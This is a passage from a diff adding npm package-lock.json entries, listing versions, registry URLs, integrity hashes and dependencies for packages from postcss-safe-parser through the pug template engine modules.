"opencollective", + "url": "https://opencollective.com/postcss/" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/postcss-safe-parser" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "peer": true, + "engines": { + "node": ">=18.0" + }, + "peerDependencies": { + "postcss": "^8.4.31" + } + }, + "node_modules/postcss-scss": { + "version": "4.0.9", + "resolved": "https://registry.npmjs.org/postcss-scss/-/postcss-scss-4.0.9.tgz", + "integrity": "sha512-AjKOeiwAitL/MXxQW2DliT28EKukvvbEWx3LBmJIRN8KfBGZbRTxNYW0kSqi1COiTZ57nZ9NW06S6ux//N1c9A==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/postcss-scss" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "engines": { + "node": ">=12.0" + }, + "peerDependencies": { + "postcss": "^8.4.29" + } + }, + "node_modules/postcss-selector-not": { + "version": "7.0.1", + "resolved": "https://registry.npmjs.org/postcss-selector-not/-/postcss-selector-not-7.0.1.tgz", + "integrity": "sha512-1zT5C27b/zeJhchN7fP0kBr16Cc61mu7Si9uWWLoA3Px/D9tIJPKchJCkUH3tPO5D0pCFmGeApAv8XpXBQJ8SQ==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-selector-parser": { + "version": "6.0.16", + "resolved": "https://registry.npmjs.org/postcss-selector-parser/-/postcss-selector-parser-6.0.16.tgz", + "integrity": "sha512-A0RVJrX+IUkVZbW3ClroRWurercFhieevHB38sr2+l9eUClMqome3LmEmnhlNy+5Mr2EYN6B2Kaw9wYdd+VHiw==", + "dev": true, + "dependencies": { + "cssesc": "^3.0.0", + "util-deprecate": "^1.0.2" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/postcss-svgo": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-svgo/-/postcss-svgo-6.0.0.tgz", + "integrity": "sha512-r9zvj/wGAoAIodn84dR/kFqwhINp5YsJkLoujybWG59grR/IHx+uQ2Zo+IcOwM0jskfYX3R0mo+1Kip1VSNcvw==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0", + "svgo": "^3.0.2" + }, + "engines": { + "node": "^14 || ^16 || >= 18" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-unique-selectors": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-unique-selectors/-/postcss-unique-selectors-6.0.0.tgz", + "integrity": "sha512-EPQzpZNxOxP7777t73RQpZE5e9TrnCrkvp7AH7a0l89JmZiPnS82y216JowHXwpBCQitfyxrof9TK3rYbi7/Yw==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.5" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-value-parser": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/postcss-value-parser/-/postcss-value-parser-4.2.0.tgz", + "integrity": "sha512-1NNCs6uurfkVbeXG4S8JFT9t19m45ICnif8zWLd5oPSZ50QnwMfK+H3jv408d4jw/7Bttv5axS5IiHoLaVNHeQ==", + "dev": true + }, + "node_modules/postcss/node_modules/nanoid": { + "version": "3.3.7", + "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.3.7.tgz", + "integrity": "sha512-eSRppjcPIatRIMC1U6UngP8XFcz8MQWGQdt1MTBQ7NaAmvXDfvNxbvWV3x2y6CdEUciCSsDHDQZbhYaB8QEo2g==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "bin": { + "nanoid": "bin/nanoid.cjs" + }, + "engines": { + "node": "^10 || ^12 || ^13.7 || ^14 || >=15.0.1" + } + }, + "node_modules/postgres-array": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/postgres-array/-/postgres-array-2.0.0.tgz", + "integrity": "sha512-VpZrUqU5A69eQyW2c5CA1jtLecCsN2U/bD6VilrFDWq5+5UIEVO7nazS3TEcHf1zuPYO/sqGvUvW62g86RXZuA==", + "engines": { + "node": ">=4" + } + }, + "node_modules/postgres-bytea": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/postgres-bytea/-/postgres-bytea-1.0.0.tgz", + "integrity": "sha1-AntTPAqokOJtFy1Hz5zOzFIazTU=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/postgres-date": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/postgres-date/-/postgres-date-1.0.7.tgz", + "integrity": "sha512-suDmjLVQg78nMK2UZ454hAG+OAW+HQPZ6n++TNDUX+L0+uUlLywnoxJKDou51Zm+zTCjrCl0Nq6J9C5hP9vK/Q==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/postgres-interval": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/postgres-interval/-/postgres-interval-1.2.0.tgz", + "integrity": "sha512-9ZhXKM/rw350N1ovuWHbGxnGh/SNJ4cnxHiM0rxE4VN41wsg8P8zWn9hv/buK00RP4WvlOyr/RBDiptyxVbkZQ==", + "dependencies": { + "xtend": "^4.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/pprof": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/pprof/-/pprof-3.2.1.tgz", + "integrity": "sha512-KnextTM3EHQ2zqN8fUjB0VpE+njcVR7cOfo7DjJSLKzIbKTPelDtokI04ScR/Vd8CLDj+M99tsaKV+K6FHzpzA==", + "hasInstallScript": true, + "dependencies": { + "@mapbox/node-pre-gyp": "^1.0.0", + "bindings": "^1.2.1", + "delay": "^5.0.0", + "findit2": "^2.2.3", + "nan": "^2.14.0", + "p-limit": "^3.0.0", + "pify": "^5.0.0", + "protobufjs": "~7.2.4", + "source-map": "^0.7.3", + "split": "^1.0.1" + }, + "engines": { + "node": ">=10.4.1" + } + }, + "node_modules/pprof/node_modules/pify": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/pify/-/pify-5.0.0.tgz", + "integrity": "sha512-eW/gHNMlxdSP6dmG6uJip6FXN0EQBwm2clYYd8Wul42Cwu/DK8HEftzsapcNdYe2MfLiIwZqsDk2RDEsTE79hA==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/pprof/node_modules/source-map": { + "version": "0.7.4", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.7.4.tgz", + "integrity": "sha512-l3BikUxvPOcn5E74dZiq5BGsTb5yEwhaTSzccU6t4sDOH8NWJCstKO5QT2CvtFoK6F0saL7p9xHAqHOlCPJygA==", + "engines": { + "node": ">= 8" + } + }, + "node_modules/precond": { + "version": "0.2.3", + "resolved": "https://registry.npmjs.org/precond/-/precond-0.2.3.tgz", + "integrity": "sha1-qpWRvKokkj8eD0hJ0kD0fvwQdaw=", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/prelude-ls": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/prelude-ls/-/prelude-ls-1.2.1.tgz", + "integrity": "sha512-vkcDPrRZo1QZLbn5RLGPpg/WmIQ65qoWWhcGKf/b5eplkkarX0m9z8ppCat4mlOqUsWpyNuYgO3VRyrYHSzX5g==", + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/prettier": { + "version": "3.3.3", + "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.3.3.tgz", + "integrity": "sha512-i2tDNA0O5IrMO757lfrdQZCc2jPNDVntV0m/+4whiDfWaTKfMNgR7Qz0NAeGz/nRqF4m5/6CLzbP4/liHt12Ew==", + "dev": true, + "bin": { + "prettier": "bin/prettier.cjs" + }, + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/prettier/prettier?sponsor=1" + } + }, + "node_modules/prettier-linter-helpers": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/prettier-linter-helpers/-/prettier-linter-helpers-1.0.0.tgz", + "integrity": "sha512-GbK2cP9nraSSUF9N2XwUwqfzlAFlMNYYl+ShE/V+H8a9uNl/oUqB1w2EL54Jh0OlyRSd8RfWYJ3coVS4TROP2w==", + "dev": true, + "dependencies": { + "fast-diff": "^1.1.2" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/pretty-bytes": { + "version": "5.6.0", + "resolved": "https://registry.npmjs.org/pretty-bytes/-/pretty-bytes-5.6.0.tgz", + "integrity": "sha512-FFw039TmrBqFK8ma/7OL3sDz/VytdtJr044/QUJtH0wK9lb9jLq9tJyIxUwtQJHwar2BqtiA4iCWSwo9JLkzFg==", + "dev": true, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/pretty-error": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/pretty-error/-/pretty-error-4.0.0.tgz", + "integrity": "sha512-AoJ5YMAcXKYxKhuJGdcvse+Voc6v1RgnsR3nWcYU7q4t6z0Q6T86sv5Zq8VIRbOWWFpvdGE83LtdSMNd+6Y0xw==", + "dev": true, + "dependencies": { + "lodash": "^4.17.20", + "renderkid": "^3.0.0" + } + }, + "node_modules/pretty-format": { + "version": "27.5.1", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-27.5.1.tgz", + "integrity": "sha512-Qb1gy5OrP5+zDf2Bvnzdl3jsTf1qXVMazbvCoKhtKqVs4/YK4ozX4gKQJJVyNe+cajNPn0KoC0MC3FUmaHWEmQ==", + "dev": true, + "dependencies": { + "ansi-regex": "^5.0.1", + "ansi-styles": "^5.0.0", + "react-is": "^17.0.1" + }, + "engines": { + "node": "^10.13.0 || ^12.13.0 || ^14.15.0 || >=15.0.0" + } + }, + "node_modules/pretty-format/node_modules/ansi-styles": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", + "dev": true, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/pretty-ms": { + "version": "7.0.1", + "resolved": "https://registry.npmjs.org/pretty-ms/-/pretty-ms-7.0.1.tgz", + "integrity": "sha512-973driJZvxiGOQ5ONsFhOF/DtzPMOMtgC11kCpUrPGMTgqp2q/1gwzCquocrN33is0VZ5GFHXZYMM9l6h67v2Q==", + "dependencies": { + "parse-ms": "^2.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/private": { + "version": "0.1.8", + "resolved": "https://registry.npmjs.org/private/-/private-0.1.8.tgz", + "integrity": "sha512-VvivMrbvd2nKkiG38qjULzlc+4Vx4wm/whI9pQD35YrARNnhxeiRktSOhSukRLFNlzg6Br/cJPet5J/u19r/mg==", + "dev": true, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/process": { + "version": "0.11.10", + "resolved": "https://registry.npmjs.org/process/-/process-0.11.10.tgz", + "integrity": "sha1-czIwDoQBYb2j5podHZGn1LwW8YI=", + "engines": { + "node": ">= 0.6.0" + } + }, + "node_modules/process-nextick-args": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", + "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" + }, + "node_modules/progress": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/progress/-/progress-2.0.3.tgz", + "integrity": "sha512-7PiHtLll5LdnKIMw100I+8xJXR5gW2QwWYkT6iJva0bXitZKa/XMrSbdmg3r2Xnaidz9Qumd0VPaMrZlF9V9sA==", + "dev": true, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/prom-client": { + "version": "14.1.1", + "resolved": "https://registry.npmjs.org/prom-client/-/prom-client-14.1.1.tgz", + "integrity": "sha512-hFU32q7UZQ59bVJQGUtm3I2PrJ3gWvoCkilX9sF165ks1qflhugVCeK+S1JjJYHvyt3o5kj68+q3bchormjnzw==", + "dependencies": { + "tdigest": "^0.1.1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/promise": { + "version": "7.3.1", + "resolved": "https://registry.npmjs.org/promise/-/promise-7.3.1.tgz", + "integrity": "sha512-nolQXZ/4L+bP/UGlkfaIujX9BKxGwmQ9OT4mOt5yvy8iK1h3wqTEJCijzGANTCCl9nWjY41juyAn2K3Q1hLLTg==", + "dependencies": { + "asap": "~2.0.3" + } + }, + "node_modules/promise-breaker": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/promise-breaker/-/promise-breaker-6.0.0.tgz", + "integrity": "sha512-BthzO9yTPswGf7etOBiHCVuugs2N01/Q/94dIPls48z2zCmrnDptUUZzfIb+41xq0MnYZ/BzmOd6ikDR4ibNZA==" + }, + "node_modules/promise.prototype.finally": { + "version": "3.1.3", + "resolved": "https://registry.npmjs.org/promise.prototype.finally/-/promise.prototype.finally-3.1.3.tgz", + "integrity": "sha512-EXRF3fC9/0gz4qkt/f5EP5iW4kj9oFpBICNpCNOb/52+8nlHIX07FPLbi/q4qYBQ1xZqivMzTpNQSnArVASolQ==", + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.3", + "es-abstract": "^1.19.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/promptly": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/promptly/-/promptly-3.2.0.tgz", + "integrity": "sha512-WnR9obtgW+rG4oUV3hSnNGl1pHm3V1H/qD9iJBumGSmVsSC5HpZOLuu8qdMb6yCItGfT7dcRszejr/5P3i9Pug==", + "dependencies": { + "read": "^1.0.4" + } + }, + "node_modules/prompts": { + "version": "2.4.2", + "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", + "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "kleur": "^3.0.3", + "sisteransi": "^1.0.5" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/prompts/node_modules/kleur": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", + "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6" + } + }, + "node_modules/prop-types": { + "version": "15.8.1", + "resolved": "https://registry.npmjs.org/prop-types/-/prop-types-15.8.1.tgz", + "integrity": "sha512-oj87CgZICdulUohogVAR7AjlC0327U4el4L6eAvOqCeudMDVU0NThNaV+b9Df4dXgSP1gXMTnPdhfe/2qDH5cg==", + "dependencies": { + "loose-envify": "^1.4.0", + "object-assign": "^4.1.1", + "react-is": "^16.13.1" + } + }, + "node_modules/prop-types-extra": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/prop-types-extra/-/prop-types-extra-1.1.1.tgz", + "integrity": "sha512-59+AHNnHYCdiC+vMwY52WmvP5dM3QLeoumYuEyceQDi9aEhtwN9zIQ2ZNo25sMyXnbh32h+P1ezDsUpUH3JAew==", + "dev": true, + "dependencies": { + "react-is": "^16.3.2", + "warning": "^4.0.0" + }, + "peerDependencies": { + "react": ">=0.14.0" + } + }, + "node_modules/prop-types-extra/node_modules/react-is": { + "version": "16.13.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.13.1.tgz", + "integrity": "sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ==", + "dev": true + }, + "node_modules/prop-types-extra/node_modules/warning": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/warning/-/warning-4.0.3.tgz", + "integrity": "sha512-rpJyN222KWIvHJ/F53XSZv0Zl/accqHR8et1kpaMTD/fLCRxtV8iX8czMzY7sVZupTI3zcUTg8eycS2kNF9l6w==", + "dev": true, + "dependencies": { + "loose-envify": "^1.0.0" + } + }, + "node_modules/prop-types/node_modules/react-is": { + "version": "16.13.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.13.1.tgz", + "integrity": "sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ==" + }, + "node_modules/propagate": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/propagate/-/propagate-2.0.1.tgz", + "integrity": "sha512-vGrhOavPSTz4QVNuBNdcNXePNdNMaO1xj9yBeH1ScQPjk/rhg9sSlCXPhMkFuaNNW/syTvYqsnbIJxMBfRbbag==", + "dev": true, + "engines": { + "node": ">= 8" + } + }, + "node_modules/property-expr": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/property-expr/-/property-expr-2.0.5.tgz", + "integrity": "sha512-IJUkICM5dP5znhCckHSv30Q4b5/JA5enCtkRHYaOVOAocnH/1BQEYTC5NMfT3AVl/iXKdr3aqQbQn9DxyWknwA==", + "dev": true + }, + "node_modules/proto-list": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/proto-list/-/proto-list-1.2.4.tgz", + "integrity": "sha512-vtK/94akxsTMhe0/cbfpR+syPuszcuwhqVjJq26CuNDgFGj682oRBXOP5MJpv2r7JtE8MsiepGIqvvOTBwn2vA==", + "dev": true + }, + "node_modules/proto3-json-serializer": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/proto3-json-serializer/-/proto3-json-serializer-1.1.1.tgz", + "integrity": "sha512-AwAuY4g9nxx0u52DnSMkqqgyLHaW/XaPLtaAo3y/ZCfeaQB/g4YDH4kb8Wc/mWzWvu0YjOznVnfn373MVZZrgw==", + "dependencies": { + "protobufjs": "^7.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/protobufjs": { + "version": "7.2.5", + "resolved": "https://registry.npmjs.org/protobufjs/-/protobufjs-7.2.5.tgz", + "integrity": "sha512-gGXRSXvxQ7UiPgfw8gevrfRWcTlSbOFg+p/N+JVJEK5VhueL2miT6qTymqAmjr1Q5WbOCyJbyrk6JfWKwlFn6A==", + "hasInstallScript": true, + "dependencies": { + "@protobufjs/aspromise": "^1.1.2", + "@protobufjs/base64": "^1.1.2", + "@protobufjs/codegen": "^2.0.4", + "@protobufjs/eventemitter": "^1.1.0", + "@protobufjs/fetch": "^1.1.0", + "@protobufjs/float": "^1.0.2", + "@protobufjs/inquire": "^1.1.0", + "@protobufjs/path": "^1.1.2", + "@protobufjs/pool": "^1.1.0", + "@protobufjs/utf8": "^1.1.0", + "@types/node": ">=13.7.0", + "long": "^5.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/protobufjs-cli": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/protobufjs-cli/-/protobufjs-cli-1.1.1.tgz", + "integrity": "sha512-VPWMgIcRNyQwWUv8OLPyGQ/0lQY/QTQAVN5fh+XzfDwsVw1FZ2L3DM/bcBf8WPiRz2tNpaov9lPZfNcmNo6LXA==", + "dependencies": { + "chalk": "^4.0.0", + "escodegen": "^1.13.0", + "espree": "^9.0.0", + "estraverse": "^5.1.0", + "glob": "^8.0.0", + "jsdoc": "^4.0.0", + "minimist": "^1.2.0", + "semver": "^7.1.2", + "tmp": "^0.2.1", + "uglify-js": "^3.7.7" + }, + "bin": { + "pbjs": "bin/pbjs", + "pbts": "bin/pbts" + }, + "engines": { + "node": ">=12.0.0" + }, + "peerDependencies": { + "protobufjs": "^7.0.0" + } + }, + "node_modules/protobufjs-cli/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/protobufjs-cli/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/protobufjs-cli/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/protobufjs-cli/node_modules/escodegen": { + "version": "1.14.3", + "resolved": "https://registry.npmjs.org/escodegen/-/escodegen-1.14.3.tgz", + "integrity": "sha512-qFcX0XJkdg+PB3xjZZG/wKSuT1PnQWx57+TVSjIMmILd2yC/6ByYElPwJnslDsuWuSAp4AwJGumarAAmJch5Kw==", + "dependencies": { + "esprima": "^4.0.1", + "estraverse": "^4.2.0", + "esutils": "^2.0.2", + "optionator": "^0.8.1" + }, + "bin": { + "escodegen": "bin/escodegen.js", + "esgenerate": "bin/esgenerate.js" + }, + "engines": { + "node": ">=4.0" + }, + "optionalDependencies": { + "source-map": "~0.6.1" + } + }, + "node_modules/protobufjs-cli/node_modules/escodegen/node_modules/estraverse": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-4.3.0.tgz", + "integrity": "sha512-39nnKffWz8xN1BU/2c79n9nB9HDzo0niYUqx6xyqUnyoAnQyyWpOTdZEeiCch8BBu515t4wp9ZmgVfVhn9EBpw==", + "engines": { + "node": ">=4.0" + } + }, + "node_modules/protobufjs-cli/node_modules/glob": { + "version": "8.1.0", + "resolved": "https://registry.npmjs.org/glob/-/glob-8.1.0.tgz", + "integrity": "sha512-r8hpEjiQEYlF2QU0df3dS+nxxSIreXQS1qRhMJM0Q5NDdR386C7jb7Hwwod8Fgiuex+k0GFjgft18yvxm5XoCQ==", + "deprecated": "Glob versions prior to v9 are no longer supported", + "dependencies": { + "fs.realpath": "^1.0.0", + "inflight": "^1.0.4", + "inherits": "2", + "minimatch": "^5.0.1", + "once": "^1.3.0" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/protobufjs-cli/node_modules/minimatch": { + "version": "5.1.6", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", + "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/protobufjs-cli/node_modules/semver": { + "version": "7.6.2", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.2.tgz", + "integrity": "sha512-FNAIBWCx9qcRhoHcgcJ0gvU7SN1lYU2ZXuSfl04bSC5OpvDHFyJCjdNHomPXxjQlCBU67YW64PzY7/VIEH7F2w==", + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/protobufjs-cli/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/proxy-addr": { + "version": "2.0.7", + "resolved": "https://registry.npmjs.org/proxy-addr/-/proxy-addr-2.0.7.tgz", + "integrity": "sha512-llQsMLSUDUPT44jdrU/O37qlnifitDP+ZwrmmZcoSKyLKvtZxpyV0n2/bD/N4tBAAZ/gJEdZU7KMraoK1+XYAg==", + "dependencies": { + "forwarded": "0.2.0", + "ipaddr.js": "1.9.1" + }, + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/proxy-from-env": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.0.0.tgz", + "integrity": "sha1-M8UDmPcOp+uW0h97gXYwpVeRx+4=", + "dev": true + }, + "node_modules/prr": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/prr/-/prr-1.0.1.tgz", + "integrity": "sha1-0/wRS6BplaRexok/SEzrHXj19HY=", + "dev": true, + "optional": true + }, + "node_modules/pseudomap": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/pseudomap/-/pseudomap-1.0.2.tgz", + "integrity": "sha1-8FKijacOYYkX7wqKw0wa5aaChrM=" + }, + "node_modules/psl": { + "version": "1.8.0", + "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", + "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==" + }, + "node_modules/pstree.remy": { + "version": "1.1.8", + "resolved": "https://registry.npmjs.org/pstree.remy/-/pstree.remy-1.1.8.tgz", + "integrity": "sha512-77DZwxQmxKnu3aR542U+X8FypNzbfJ+C5XQDk3uWjWxn6151aIMGthWYRXTqT1E5oJvg+ljaa2OJi+VfvCOQ8w==", + "dev": true + }, + "node_modules/pug": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/pug/-/pug-3.0.3.tgz", + "integrity": "sha512-uBi6kmc9f3SZ3PXxqcHiUZLmIXgfgWooKWXcwSGwQd2Zi5Rb0bT14+8CJjJgI8AB+nndLaNgHGrcc6bPIB665g==", + "dependencies": { + "pug-code-gen": "^3.0.3", + "pug-filters": "^4.0.0", + "pug-lexer": "^5.0.1", + "pug-linker": "^4.0.0", + "pug-load": "^3.0.0", + "pug-parser": "^6.0.0", + "pug-runtime": "^3.0.1", + "pug-strip-comments": "^2.0.0" + } + }, + "node_modules/pug-attrs": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/pug-attrs/-/pug-attrs-3.0.0.tgz", + "integrity": "sha512-azINV9dUtzPMFQktvTXciNAfAuVh/L/JCl0vtPCwvOA21uZrC08K/UnmrL+SXGEVc1FwzjW62+xw5S/uaLj6cA==", + "dependencies": { + "constantinople": "^4.0.1", + "js-stringify": "^1.0.2", + "pug-runtime": "^3.0.0" + } + }, + "node_modules/pug-code-gen": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/pug-code-gen/-/pug-code-gen-3.0.3.tgz", + "integrity": "sha512-cYQg0JW0w32Ux+XTeZnBEeuWrAY7/HNE6TWnhiHGnnRYlCgyAUPoyh9KzCMa9WhcJlJ1AtQqpEYHc+vbCzA+Aw==", + "dependencies": { + "constantinople": "^4.0.1", + "doctypes": "^1.1.0", + "js-stringify": "^1.0.2", + "pug-attrs": "^3.0.0", + "pug-error": "^2.1.0", + "pug-runtime": "^3.0.1", + "void-elements": "^3.1.0", + "with": "^7.0.0" + } + }, + "node_modules/pug-error": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/pug-error/-/pug-error-2.1.0.tgz", + "integrity": "sha512-lv7sU9e5Jk8IeUheHata6/UThZ7RK2jnaaNztxfPYUY+VxZyk/ePVaNZ/vwmH8WqGvDz3LrNYt/+gA55NDg6Pg==" + }, + "node_modules/pug-filters": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/pug-filters/-/pug-filters-4.0.0.tgz", + "integrity": "sha512-yeNFtq5Yxmfz0f9z2rMXGw/8/4i1cCFecw/Q7+D0V2DdtII5UvqE12VaZ2AY7ri6o5RNXiweGH79OCq+2RQU4A==", + "dependencies": { + "constantinople": "^4.0.1", + "jstransformer": "1.0.0", + "pug-error": "^2.0.0", + "pug-walk": "^2.0.0", + "resolve": "^1.15.1" + } + }, + "node_modules/pug-lexer": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/pug-lexer/-/pug-lexer-5.0.1.tgz", + "integrity": "sha512-0I6C62+keXlZPZkOJeVam9aBLVP2EnbeDw3An+k0/QlqdwH6rv8284nko14Na7c0TtqtogfWXcRoFE4O4Ff20w==", + "dependencies": { + "character-parser": "^2.2.0", + "is-expression": "^4.0.0", + "pug-error": "^2.0.0" + } + }, + "node_modules/pug-linker": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/pug-linker/-/pug-linker-4.0.0.tgz", + "integrity": 